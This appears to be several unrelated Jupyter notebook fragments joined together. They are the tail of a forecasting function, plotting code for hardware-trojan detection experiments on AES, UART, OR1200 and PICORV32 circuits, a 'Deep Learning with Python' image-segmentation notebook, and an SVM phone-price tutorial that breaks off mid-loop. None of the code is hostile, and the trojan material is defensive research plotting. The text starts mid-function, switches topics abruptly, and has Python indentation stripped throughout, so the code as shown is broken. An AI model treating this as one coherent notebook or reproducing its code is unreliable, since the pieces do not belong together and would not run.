phi_sigma[h][day, day] = v
# phi_mu[h], phi_sigma[h] = get_latent_factor_fxnl_old((today + h) % period, mod.L, a, R, mod.iseas, mod.seasPeriods[0])
# Find covariances with previous latent factor values
for j in range(h):
# Covariance matrix between the state vector at times j, i, i > j
day_j = (today + j) % period
cov_jh = forecast_R_cov(mod, j, h)[np.ix_(iseas, iseas)]
phi_psi[h-1][day, day_j, j] = phi_psi[h-1][day_j, day, j] = (L @ cov_jh @ L.T)[day, day_j]
# cov_ij = (np.linalg.matrix_power(mod.G, h-j) @ Rlist[j])[np.ix_(mod.iseas, mod.iseas)]
return phi_mu, phi_sigma, phi_psi
#hide
from nbdev.export import notebook2script
notebook2script()
```
```
import sys
sys.path.insert(0, '../scripts')
from load_data_df import *
import matplotlib.gridspec as gridspec
from mpl_toolkits.axes_grid1.inset_locator import zoomed_inset_axes, inset_axes
from mpl_toolkits.axes_grid1.inset_locator import mark_inset
```
# Data Paths
```
# AES
tjfree_aes_data_dir = '/Users/ti27457/Repos/ttb/circuits/aes/tjfree_75eds'
mal_aes_data_dir = '/Users/ti27457/Repos/ttb/circuits/aes/mal_75eds'
# UART
tjfree_uart_data_dir = '/Users/ti27457/Repos/ttb/circuits/uart/tjfree_16bytes'
mal_uart_data_dir = '/Users/ti27457/Repos/ttb/circuits/uart/mal_16bytes'
# OR1200
tjfree_or1200_data_dir = '/Users/ti27457/Repos/ttb/circuits/or1200/tjfree_combined'
mal_or1200_data_dir = '/Users/ti27457/Repos/ttb/circuits/or1200/mal_combined'
# PICORV32
tjfree_picorv32_data_dir = '/Users/ti27457/Repos/ttb/circuits/picorv32'
mal_picorv32_data_dir = '/Users/ti27457/Repos/ttb/circuits/picorv32'
```
# Plot Settings
```
# Plot Settings
FIG_WIDTH = 9
FIG_HEIGHT = 4
LINE_WIDTH = 2
HIST_SAVE_AS_PDF = True
AES_SAVE_AS_PDF = True
UART_SAVE_AS_PDF = True
OR1200_SAVE_AS_PDF = True
PICORV32_SAVE_AS_PDF = True
# Plot PDF Filenames
# HIST_PDF_FILENAME = 'cntr_sizes_histogram.pdf'
AES_PDF_FILENAME = 'aes-75tests-100res-100ps-2x.pdf'
UART_PDF_FILENAME = 'uart-1tests-1000res-100ps-2x.pdf'
OR1200_PDF_FILENAME = 'or1200-1tests-10000res-100ps-combined-2x.pdf'
PICORV32_PDF_FILENAME = 'picorv32-1tests-10000000res-1ps-combined-1x.pdf'
```
# Plot Function
```
def plot_counter_fps(tjfree_dir, mal_dir, epochs, y_lims, pdf_fname, save_as_pdf=False):
tjfree_df = load_data_df_wf(tjfree_dir)
mal_df = load_data_df_wf(mal_dir)
# Plot Data
sns.set()
plt.subplots(figsize=(FIG_WIDTH, FIG_HEIGHT))
gs = gridspec.GridSpec(2, len(epochs) - 1)
gs.update(wspace=0.1, hspace=0.2) # set the spacing between axes.
main_ax = plt.subplot(gs[0, :])
# Plot Data in Pane 1
# sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=tjfree_df, ax=main_ax, linewidth=LINE_WIDTH)
# sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=tjfree_df, ax=main_ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=mal_df, ax=main_ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=mal_df, ax=main_ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=tjfree_df, ax=main_ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=tjfree_df, ax=main_ax, linewidth=LINE_WIDTH)
# Format Plot in Pane 1
main_ax.set_xlim(0, epochs[-1])
main_ax.set_xlabel('')
main_ax.set_ylabel('# Counters')
# main_ax.get_xaxis().set_ticks([])
main_ax.get_xaxis().set_ticklabels([])
for tick in main_ax.get_yticklabels():
tick.set_rotation(90)
# Plot remaining panes
for pane_num in range(len(epochs) - 1):
# Set Axis
ax = plt.subplot(gs[1, pane_num])
# Plot Data
# sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
# sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
# Format Plot
ax.set_xlim(epochs[pane_num], epochs[pane_num + 1])
ax.set_ylim(-y_lims[pane_num]/25.0, y_lims[pane_num])
if pane_num == 0:
ax.set_ylabel('# Counters')
else:
ax.set_ylabel('')
ax.set_xlabel('Time (ns)')
# ax.grid()
for tick in ax.get_yticklabels():
tick.set_rotation(90)
# # Last Pane
# ax3.set_ylabel('# Counters')
# ax3.yaxis.tick_right()
# ax3.yaxis.set_label_position("right")
# ax3.set_xlabel('Time (ns)')
# Set Legend
main_ax.legend(['Coalesced Suspicious','Distributed Suspicious','Coalesced Constants','Distributed Constants'])
# # Add Line Separators to Pane 1
# for x_coord in epochs:
# main_ax.axvline(x=x_coord, color='k', linestyle='-')
# Save as PDF
if save_as_pdf:
plt.savefig(pdf_fname, format='pdf', bbox_inches='tight')
def plot_counter_fps_detail(tjfree_dir, mal_dir, epochs, y_lim, x_lim, pdf_fname, save_as_pdf=False):
tjfree_df = load_data_df_wf(tjfree_dir)
mal_df = load_data_df_wf(mal_dir)
# Plot Data
sns.set()
fig, ax = plt.subplots(1, 1, figsize=(FIG_WIDTH, FIG_HEIGHT))
# Plot Data
# sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
# sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
# Format Plot in Pane 1
ax.set_xlim(x_lim)
ax.set_ylim(y_lim)
ax.set_xlabel('Time (ns)')
ax.set_ylabel('# Counters')
for tick in ax.get_yticklabels():
tick.set_rotation(90)
# Set Legend
ax.legend(['Coalesced Suspicious','Distributed Suspicious','Coalesced Constants','Distributed Constants'])
# # Add Line Separators to Pane 1
# for x_coord in epochs[1:]:
# ax.axvline(x=x_coord, color='k', linestyle='-')
# Save as PDF
if save_as_pdf:
plt.savefig(pdf_fname, format='pdf', bbox_inches='tight')
def plot_ttt_timeseries(clk_period, epochs, ylim, tjfree_df, mal_df):
# Create Figure
sns.set()
fig, ax = plt.subplots(1, 1, figsize=(9, 3))
# Plot Data
# sns.lineplot(x="Time", y="Total Malicious Coalesced Cntrs", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
# sns.lineplot(x="Time", y="Total Malicious Distributed Cntrs", data=tjfree_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Coalesced TTTs", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed TTTs", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=mal_df, ax=ax, linewidth=LINE_WIDTH)
# Format Main Plot
ax.set_ylim(-10, ylim)
ax.set_xlabel('Clock Cycles')
ax.set_ylabel('# SSCs')
for tick in ax.get_yticklabels():
tick.set_rotation(90)
# Add background shading to indicate different testing phases
shade = True
    cycle_epochs = list(map(lambda x: float(x) / float(clk_period), epochs))  # list() so the epochs can be indexed below (Python 3)
for i in range(1, len(cycle_epochs[0:-1])):
x_coord = cycle_epochs[i]
next_x_coord = cycle_epochs[i+1]
# plt.axvline(x=(x_coord-50000), color='0.1', linestyle='--', alpha=.5)
if shade:
ax.fill_between([x_coord, next_x_coord], -10, ylim, facecolor='#bac0c2', alpha=0.5)
shade = not shade
return ax
```
# Plot AES False Positives
```
# Define Design Characteristics
aes_clk_period = 10
aes_epochs = [0, 9900, 19800]
aes_ylim = 500
# Load Data
aes_tjfree_df = load_data_df_wf(tjfree_aes_data_dir, aes_clk_period, 'aes')
aes_mal_df = load_data_df_wf(mal_aes_data_dir, aes_clk_period, 'aes')
# Create Main Plot
ax = plot_ttt_timeseries(aes_clk_period, \
aes_epochs, \
aes_ylim, \
aes_tjfree_df, \
aes_mal_df)
# Create 4x Zoom-in Inset
axins = zoomed_inset_axes(ax, 4, loc=1, bbox_to_anchor=(575, 170))
sns.lineplot(x="Time", y="Total Malicious Coalesced TTTs", data=aes_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed TTTs", data=aes_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=aes_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=aes_mal_df, ax=axins, linewidth=LINE_WIDTH)
# Format Inset
x1, x2, y1, y2 = float(11000) / float(aes_clk_period), float(12500) / float(aes_clk_period), -10, 75
axins.set_xlim(x1, x2)
axins.set_ylim(y1, y2)
axins.set_frame_on(True)
axins.set_xlabel('')
axins.set_ylabel('')
plt.xticks(visible=False)
plt.yticks(visible=False)
mark_inset(ax, axins, loc1=2, loc2=4, fc="none", ec="0.5")
plt.setp(axins.spines.values(), color='0.5')
plt.setp([axins.get_xticklines(), axins.get_yticklines()], color='0.5')
# Create Legend
legend_labels = ['Coalesced Suspicious','Distributed Suspicious','Coalesced Constants','Distributed Constants']
ax.legend(legend_labels, loc='center left', bbox_to_anchor=(1, 0.5))
# ax.legend(legend_labels, loc='upper center', bbox_to_anchor=(0.35, 1))
# Save as PDF
if AES_SAVE_AS_PDF:
plt.savefig(AES_PDF_FILENAME, format='pdf', bbox_inches='tight', transparent=False)
```
# Plot UART False Positives
```
# Define Design Characteristics
uart_clk_period = 10
uart_epochs = [0, 786150, 1349660, 4482460, 5046260, 8179060]
uart_epochs = list(map(lambda x: x - 30000, uart_epochs))  # shift epochs; list() keeps them indexable under Python 3
uart_ylim = 150
# Load Data
uart_tjfree_df = load_data_df_wf(tjfree_uart_data_dir, uart_clk_period, 'uart')
uart_mal_df = load_data_df_wf(mal_uart_data_dir, uart_clk_period, 'uart')
# Create Main Plot
ax = plot_ttt_timeseries(uart_clk_period, \
uart_epochs, \
uart_ylim, \
uart_tjfree_df, \
uart_mal_df)
# Create 2x zoom-in inset
axins = zoomed_inset_axes(ax, 2, loc=1, bbox_to_anchor=(575, 175))
sns.lineplot(x="Time", y="Total Malicious Coalesced TTTs", data=uart_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed TTTs", data=uart_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=uart_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=uart_mal_df, ax=axins, linewidth=LINE_WIDTH)
# Format Inset Plot
x1, x2, y1, y2 = float(6250000) / float(uart_clk_period) , float(7100000) / float(uart_clk_period), -5, 30
axins.set_xlim(x1, x2)
axins.set_ylim(y1, y2)
axins.set_frame_on(True)
axins.set_xlabel('')
axins.set_ylabel('')
plt.xticks(visible=False)
plt.yticks(visible=False)
mark_inset(ax, axins, loc1=4, loc2=2, fc="none", ec="0.5")
plt.setp(axins.spines.values(), color='0.5')
plt.setp([axins.get_xticklines(), axins.get_yticklines()], color='0.5')
# Create Legend
legend_labels = ['Coalesced Suspicious','Distributed Suspicious','Coalesced Constants','Distributed Constants']
ax.legend(legend_labels, loc='center left', bbox_to_anchor=(1, 0.5))
# Save as PDF
if UART_SAVE_AS_PDF:
plt.savefig(UART_PDF_FILENAME, format='pdf', bbox_inches='tight', transparent=False)
```
# Plot OR1200 False Positives
```
# Define Design Characteristics
or1200_clk_period = 20
or1200_epochs = [0,2620900,5241700,7035700,8829700,8898100,8966500,9051700,9136900,9882700,10628500,18361300, 26094100,27429100,28764100,28836100,28908100]
or1200_ylim = 175
or1200_cycle_epochs = list(map(lambda x: float(x) / float(or1200_clk_period), or1200_epochs))
# Load Data
or1200_tjfree_df = load_data_df_wf(tjfree_or1200_data_dir, or1200_clk_period, 'or1200')
or1200_mal_df = load_data_df_wf(mal_or1200_data_dir, or1200_clk_period, 'or1200')
# Create Main Plot
ax = plot_ttt_timeseries(or1200_clk_period, \
or1200_epochs, \
or1200_ylim, \
or1200_tjfree_df, \
or1200_mal_df)
# ============================================================================================================
# Create Zoom-in Inset 1
# axins = zoomed_inset_axes(ax, 6, loc=2, bbox_to_anchor=(280, 230)) # zoom = 2
axins = inset_axes(ax, 3, 1.1, loc=2, bbox_to_anchor=(0.2, 1.3), bbox_transform=ax.figure.transFigure) # stretch, no zoom
sns.lineplot(x="Time", y="Total Malicious Coalesced TTTs", data=or1200_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed TTTs", data=or1200_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=or1200_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=or1200_mal_df, ax=axins, linewidth=LINE_WIDTH)
# Add Line Separators
shade = True
for i in range(0, len(or1200_cycle_epochs[0:-1])):
x_coord = or1200_cycle_epochs[i]
next_x_coord = or1200_cycle_epochs[i+1]
# plt.axvline(x=(x_coord), color='0.1', linestyle='--', alpha=.5)
if shade:
axins.fill_between([x_coord, next_x_coord], -10, or1200_ylim, facecolor='#bac0c2', alpha=0.5)
shade = not shade
# Format Inset
x1, x2, y1, y2 = float(8600000) / float(or1200_clk_period), float(9300000) / float(or1200_clk_period), 50, 70
axins.set_xlim(x1, x2)
axins.set_ylim(y1, y2)
axins.set_frame_on(True)
axins.set_xlabel('')
axins.set_ylabel('')
plt.xticks(visible=False)
plt.yticks(visible=False)
mark_inset(ax, axins, loc1=3, loc2=4, fc="none", ec="0.5")
plt.setp(axins.spines.values(), color='0.5')
plt.setp([axins.get_xticklines(), axins.get_yticklines()], color='0.5')
# ============================================================================================================
# Create Zoom-in Inset 2
# axins2 = zoomed_inset_axes(ax, 6, loc=2, bbox_to_anchor=(460, 230)) # zoom = 5
axins2 = inset_axes(ax, 1.5, 1.1, loc=2, bbox_to_anchor=(0.73, 1.3), bbox_transform=ax.figure.transFigure) # stretch, no zoom
sns.lineplot(x="Time", y="Total Malicious Coalesced TTTs", data=or1200_mal_df, ax=axins2, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed TTTs", data=or1200_mal_df, ax=axins2, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=or1200_mal_df, ax=axins2, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=or1200_mal_df, ax=axins2, linewidth=LINE_WIDTH)
# Add Line Separators
shade = True
for i in range(0, len(or1200_cycle_epochs[0:-1])):
x_coord = or1200_cycle_epochs[i]
next_x_coord = or1200_cycle_epochs[i+1]
# plt.axvline(x=(x_coord), color='0.1', linestyle='--', alpha=.5)
if shade:
axins2.fill_between([x_coord, next_x_coord], -10, or1200_ylim, facecolor='#bac0c2', alpha=0.5)
shade = not shade
# Format Inset
x1, x2, y1, y2 = float(28750000) / float(or1200_clk_period), float(28930000) / float(or1200_clk_period), -5, 20
axins2.set_xlim(x1, x2)
axins2.set_ylim(y1, y2)
axins2.set_frame_on(True)
axins2.set_xlabel('')
axins2.set_ylabel('')
axins2.xaxis.set_ticklabels([])
axins2.yaxis.set_ticklabels([])
mark_inset(ax, axins2, loc1=3, loc2=4, fc="none", ec="0.5")
plt.setp(axins2.spines.values(), color='0.5')
plt.setp([axins2.get_xticklines(), axins2.get_yticklines()], color='0.5')
# ============================================================================================================
# Create Legend
legend_labels = ['Coalesced Suspicious','Distributed Suspicious','Coalesced Constants','Distributed Constants']
ax.legend(legend_labels, loc='center left', bbox_to_anchor=(1, 0.5))
# ax.legend(legend_labels, loc='upper center', bbox_to_anchor=(0.35, 1))
# Save as PDF
if OR1200_SAVE_AS_PDF:
plt.savefig(OR1200_PDF_FILENAME, format='pdf', bbox_inches='tight', transparent=False)
```
# Plot PICORV32 False Positives
```
# Define Design Characteristics
picorv32_clk_period = 10000
# picorv32_epochs = [0, 9112, 9335, 9458, 9634, 10039, 10972, 11909, 12842, 13847, 16082, 18389, 19173, 19993, 20843, 21646, 22506, 24551, 27359, 29582, 30347, 31097, 31757, 32392, 34233, 35180, 36128, 37120, 39157, 41774, 44261, 46280, 48383, 51450, 53974, 56061, 58762, 64181, 70256, 76298, 80204, 80833, 81484, 83321, 83969, 84155, 84214, 84669, 110391]
# picorv32_epochs = [0, 103183, 128433, 132297]
picorv32_epochs = [0, 10308, 22324, 29980, 49939, 75850, 99600, 102410, 132162]
picorv32_epochs_scaled = list(map(lambda x: x * picorv32_clk_period, picorv32_epochs))
picorv32_ylim = 250
picorv32_cycle_epochs = list(map(lambda x: float(x) / float(picorv32_clk_period), picorv32_epochs))
# Load Data
picorv32_tjfree_df = load_data_df_wf(tjfree_picorv32_data_dir, picorv32_clk_period, 'picorv32')
picorv32_mal_df = load_data_df_wf(mal_picorv32_data_dir, picorv32_clk_period, 'picorv32')
# Create Main Plot
ax = plot_ttt_timeseries(picorv32_clk_period, \
picorv32_epochs_scaled, \
picorv32_ylim, \
picorv32_tjfree_df, \
picorv32_mal_df)
# ============================================================================================================
# Create Zoom-in Inset 1
# axins = zoomed_inset_axes(ax, 6, loc=2, bbox_to_anchor=(280, 230)) # zoom = 2
axins = inset_axes(ax, 1, 1, loc=3, bbox_to_anchor=(0.76, 0.3), bbox_transform=ax.figure.transFigure) # stretch, no zoom
sns.lineplot(x="Time", y="Total Malicious Coalesced TTTs", data=picorv32_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Total Malicious Distributed TTTs", data=picorv32_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Coalesced Constants", data=picorv32_mal_df, ax=axins, linewidth=LINE_WIDTH)
sns.lineplot(x="Time", y="Distributed Constants", data=picorv32_mal_df, ax=axins, linewidth=LINE_WIDTH)
# Add Line Separators
shade = True
for i in range(0, len(picorv32_epochs[0:-1])):
x_coord = picorv32_epochs[i]
next_x_coord = picorv32_epochs[i+1]
# plt.axvline(x=(x_coord), color='0.1', linestyle='--', alpha=.5)
if shade:
axins.fill_between([x_coord, next_x_coord], -10, picorv32_ylim, facecolor='#bac0c2', alpha=0.5)
shade = not shade
# Format Inset
x1, x2, y1, y2 = 131500, 132500, 0, 20
axins.set_xlim(x1, x2)
axins.set_ylim(y1, y2)
axins.set_frame_on(True)
axins.set_xlabel('')
axins.set_ylabel('')
plt.xticks(visible=False)
plt.yticks(visible=False)
mark_inset(ax, axins, loc1=3, loc2=4, fc="none", ec="0.5")
plt.setp(axins.spines.values(), color='0.5')
plt.setp([axins.get_xticklines(), axins.get_yticklines()], color='0.5')
# ============================================================================================================
# Create Legend
legend_labels = ['Coalesced Suspicious','Distributed Suspicious','Coalesced Constants','Distributed Constants']
ax.legend(legend_labels, loc='center left', bbox_to_anchor=(1, 0.5))
# ax.legend(legend_labels, loc='upper center', bbox_to_anchor=(0.35, 1))
# Save as PDF
if PICORV32_SAVE_AS_PDF:
plt.savefig(PICORV32_PDF_FILENAME, format='pdf', bbox_inches='tight', transparent=False)
```
This is a companion notebook for the book [Deep Learning with Python, Second Edition](https://www.manning.com/books/deep-learning-with-python-second-edition?a_aid=ml-ninja&a_cid=11111111&chan=c2). For readability, it only contains runnable code blocks and section titles, and omits everything else in the book: text paragraphs, figures, and pseudocode.
**If you want to be able to follow what's going on, I recommend reading the notebook side by side with your copy of the book.**
This notebook was generated for TensorFlow 2.6.
# Advanced deep learning for computer vision
## Three essential computer vision tasks
## An image segmentation example
```
!wget http://www.robots.ox.ac.uk/~vgg/data/pets/data/images.tar.gz
!wget http://www.robots.ox.ac.uk/~vgg/data/pets/data/annotations.tar.gz
!tar -xf images.tar.gz
!tar -xf annotations.tar.gz
import os
input_dir = "images/"
target_dir = "annotations/trimaps/"
input_img_paths = sorted(
[os.path.join(input_dir, fname)
for fname in os.listdir(input_dir)
if fname.endswith(".jpg")])
target_paths = sorted(
[os.path.join(target_dir, fname)
for fname in os.listdir(target_dir)
if fname.endswith(".png") and not fname.startswith(".")])
import matplotlib.pyplot as plt
from tensorflow.keras.utils import load_img, img_to_array
plt.axis("off")
plt.imshow(load_img(input_img_paths[9]))
def display_target(target_array):
normalized_array = (target_array.astype("uint8") - 1) * 127
plt.axis("off")
plt.imshow(normalized_array[:, :, 0])
img = img_to_array(load_img(target_paths[9], color_mode="grayscale"))
display_target(img)
import numpy as np
import random
img_size = (200, 200)
num_imgs = len(input_img_paths)
random.Random(1337).shuffle(input_img_paths)
random.Random(1337).shuffle(target_paths)
def path_to_input_image(path):
return img_to_array(load_img(path, target_size=img_size))
def path_to_target(path):
img = img_to_array(
load_img(path, target_size=img_size, color_mode="grayscale"))
img = img.astype("uint8") - 1
return img
input_imgs = np.zeros((num_imgs,) + img_size + (3,), dtype="float32")
targets = np.zeros((num_imgs,) + img_size + (1,), dtype="uint8")
for i in range(num_imgs):
input_imgs[i] = path_to_input_image(input_img_paths[i])
targets[i] = path_to_target(target_paths[i])
num_val_samples = 1000
train_input_imgs = input_imgs[:-num_val_samples]
train_targets = targets[:-num_val_samples]
val_input_imgs = input_imgs[-num_val_samples:]
val_targets = targets[-num_val_samples:]
from tensorflow import keras
from tensorflow.keras import layers
def get_model(img_size, num_classes):
inputs = keras.Input(shape=img_size + (3,))
x = layers.Rescaling(1./255)(inputs)
x = layers.Conv2D(64, 3, strides=2, activation="relu", padding="same")(x)
x = layers.Conv2D(64, 3, activation="relu", padding="same")(x)
x = layers.Conv2D(128, 3, strides=2, activation="relu", padding="same")(x)
x = layers.Conv2D(128, 3, activation="relu", padding="same")(x)
x = layers.Conv2D(256, 3, strides=2, padding="same", activation="relu")(x)
x = layers.Conv2D(256, 3, activation="relu", padding="same")(x)
x = layers.Conv2DTranspose(256, 3, activation="relu", padding="same")(x)
x = layers.Conv2DTranspose(256, 3, activation="relu", padding="same", strides=2)(x)
x = layers.Conv2DTranspose(128, 3, activation="relu", padding="same")(x)
x = layers.Conv2DTranspose(128, 3, activation="relu", padding="same", strides=2)(x)
x = layers.Conv2DTranspose(64, 3, activation="relu", padding="same")(x)
x = layers.Conv2DTranspose(64, 3, activation="relu", padding="same", strides=2)(x)
outputs = layers.Conv2D(num_classes, 3, activation="softmax", padding="same")(x)
model = keras.Model(inputs, outputs)
return model
model = get_model(img_size=img_size, num_classes=3)
model.summary()
model.compile(optimizer="rmsprop", loss="sparse_categorical_crossentropy")
callbacks = [
keras.callbacks.ModelCheckpoint("oxford_segmentation.keras",
save_best_only=True)
]
history = model.fit(train_input_imgs, train_targets,
epochs=50,
callbacks=callbacks,
batch_size=64,
validation_data=(val_input_imgs, val_targets))
epochs = range(1, len(history.history["loss"]) + 1)
loss = history.history["loss"]
val_loss = history.history["val_loss"]
plt.figure()
plt.plot(epochs, loss, "bo", label="Training loss")
plt.plot(epochs, val_loss, "b", label="Validation loss")
plt.title("Training and validation loss")
plt.legend()
from tensorflow.keras.utils import array_to_img
model = keras.models.load_model("oxford_segmentation.keras")
i = 4
test_image = val_input_imgs[i]
plt.axis("off")
plt.imshow(array_to_img(test_image))
mask = model.predict(np.expand_dims(test_image, 0))[0]
def display_mask(pred):
mask = np.argmax(pred, axis=-1)
mask *= 127
plt.axis("off")
plt.imshow(mask)
display_mask(mask)
```
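To sanity-check the result visually, here is a small sketch (not part of the book's code) that reuses only objects defined above to show the validation image, its ground-truth trimap, and the predicted mask side by side.

```
# Side-by-side comparison for the same validation sample: input, ground truth, prediction.
fig, axes = plt.subplots(1, 3, figsize=(12, 4))
axes[0].imshow(array_to_img(test_image))
axes[0].set_title("Input")
axes[1].imshow(val_targets[i][:, :, 0] * 127)   # ground-truth trimap, rescaled for display
axes[1].set_title("Ground truth")
axes[2].imshow(np.argmax(mask, axis=-1) * 127)  # predicted class map, rescaled for display
axes[2].set_title("Prediction")
for a in axes:
    a.axis("off")
plt.show()
```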
```
#https://www.kaggle.com/azzion/svm-for-beginners-tutorial/notebook
#https://www.kaggle.com/gulsahdemiryurek/mobile-price-classification-with-svm
#Mobile Price Classification
#The topics below are covered in this kernel.
#1. Data preprocessing
#2. Target value analysis
#3. SVM
#4. Linear SVM
#5. SV Regressor
#6. Non-linear SVM with an RBF kernel (note: you can also try poly)
#7. Non-linear SVR
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib.colors import ListedColormap
#connect to google drive
from google.colab import drive
drive.mount('/content/drive')
# A.DATA PREPROCESSING
# save filepath to variable for easier access
train_file_path = '../content/drive/MyDrive/pemb mesin/mgg 8/train1.csv'
test_file_path = '../content/drive/MyDrive/pemb mesin/mgg 8/test1.csv'
df = pd.read_csv(train_file_path)
test = pd.read_csv(test_file_path)
df.head()
df.info()
#battery_power: Total energy a battery can store in one time measured in mAh
#blue: Has bluetooth or not
#clock_speed: speed at which microprocessor executes instructions
#dual_sim: Has dual sim support or not
#fc: Front Camera mega pixels
#four_g: Has 4G or not
#int_memory: Internal Memory in Gigabytes
#m_dep: Mobile Depth in cm
#mobile_wt: Weight of mobile phone
#n_cores: Number of cores of processor
#pc: Primary Camera mega pixels
#px_height: Pixel Resolution Height
#px_width: Pixel Resolution Width
#ram: Random Access Memory in Mega Bytes
#sc_h: Screen Height of mobile in cm
#sc_w: Screen Width of mobile in cm
#talk_time: longest time that a single battery charge will last when you are constantly talking on the phone
#three_g: Has 3G or not
#touch_screen: Has touch screen or not
#wifi: Has wifi or not
#price_range: This is the target variable with value of 0(low cost), 1(medium cost), 2(high cost) and 3(very high cost).
#check for missing values
import missingno as msno
import matplotlib.pyplot as plt
msno.bar(df)
plt.show()
#B. TARGET VALUE ANALYSIS
#understanding the target value - here it is encoded as four ordinal classes; in real life price would not be encoded this way.
df['price_range'].describe(), df['price_range'].unique()
# there are 4 classes in the predicted value
#correlation matrix with heatmap (looking for correlations between features - one feature-selection technique)
corrmat = df.corr()
f,ax = plt.subplots(figsize=(12,10))
sns.heatmap(corrmat,vmax=0.8,square=True,annot=True,annot_kws={'size':8})
#price range correlation
corrmat.sort_values(by=["price_range"],ascending=False).iloc[0].sort_values(ascending=False)
f, ax = plt.subplots(figsize=(10,4))
plt.scatter(y=df['price_range'],x=df['battery_power'],color='red')
plt.scatter(y=df['price_range'],x=df['ram'],color='Green')
plt.scatter(y=df['price_range'],x=df['n_cores'],color='blue')
plt.scatter(y=df['price_range'],x=df['mobile_wt'],color='orange')
# clearly we can see that each category has a different set of value ranges
# SUPPORT VECTOR MACHINES AND METHODS :
from sklearn.svm import SVC
from sklearn.model_selection import train_test_split
y_t = np.array(df['price_range'])
X_t = df
X_t = df.drop(['price_range'],axis=1)
X_t = np.array(X_t)
print("shape of Y :"+str(y_t.shape))
print("shape of X :"+str(X_t.shape))
from sklearn.preprocessing import MinMaxScaler #(scales features to the 0-1 range)
scaler = MinMaxScaler()
X_t = scaler.fit_transform(X_t)
X_train,X_test,Y_train,Y_test = train_test_split(X_t,y_t,test_size=.20,random_state=42)
print("shape of X Train :"+str(X_train.shape))
print("shape of X Test :"+str(X_test.shape))
print("shape of Y Train :"+str(Y_train.shape))
print("shape of Y Test :"+str(Y_test.shape))
for this_C in [1,3,5,10,40,60,80,100]: #C parameter values for the linear SVM
    clf = SVC(kernel='linear',C=this_C).fit(X_train,Y_train) #fit a linear SVM classifier for this value of C
scoretrain = clf.score(X_train,Y_train)
scoretest = clf.score(X_test,Y_test)
print("Linear SVM value of C:{}, training score :{:2f} , Test Score: {:2f} \n".format(this_C,scoretrain,scoretest))
from sklearn.model_selection import cross_val_score,StratifiedKFold,LeaveOneOut
clf1 = SVC(kernel='linear',C=20).fit(X_train,Y_train)
scores = cross_val_score(clf1,X_train,Y_train,cv=5)
strat_scores = cross_val_score(clf1,X_train,Y_train,cv=StratifiedKFold(5,random_state=10,shuffle=True))
#Loo = LeaveOneOut()
#Loo_scores = cross_val_score(clf1,X_train,Y_train,cv=Loo)
print("The Cross Validation Score :"+str(scores))
print("The Average Cross Validation Score :"+str(scores.mean()))
print("The Stratified Cross Validation Score :"+str(strat_scores))
print("The Average Stratified Cross Validation Score :"+str(strat_scores.mean()))
#print("The LeaveOneOut Cross Validation Score :"+str(Loo_scores))
#print("The Average LeaveOneOut Cross Validation Score :"+str(Loo_scores.mean()))
from sklearn.dummy import DummyClassifier
for strat in ['stratified', 'most_frequent', 'prior', 'uniform']:
dummy_maj = DummyClassifier(strategy=strat).fit(X_train,Y_train)
